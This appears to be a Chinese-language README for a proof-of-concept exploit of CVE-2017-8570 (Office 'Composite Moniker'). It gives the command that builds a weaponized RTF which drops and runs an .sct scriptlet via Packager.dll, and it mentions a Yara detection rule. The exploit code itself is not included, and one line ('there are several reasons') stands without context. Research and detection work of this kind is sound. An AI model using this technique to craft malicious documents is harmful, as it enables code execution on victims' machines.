使用方法:python packager_composite_moniker.py -s calc.sct -o example.rtf
本仓库包含针对 CVE-2017-8570(即“Composite Moniker”漏洞)的概念验证利用代码。它演示了如何利用 Packager.dll 技巧将一个 sct 文件放入 %TEMP% 目录,然后利用该漏洞提供的基本功能来执行它。
有几个原因。
只需运行脚本,提供要执行的 Sct 文件和输出的 RTF 文件名:
python packager_composite_moniker.py -s calc.sct -o example.rtf
[+] RTF 文件已写入: example.rtf
我包含了一个 Yara 规则,用于检测通过 RTF 利用此漏洞的尝试。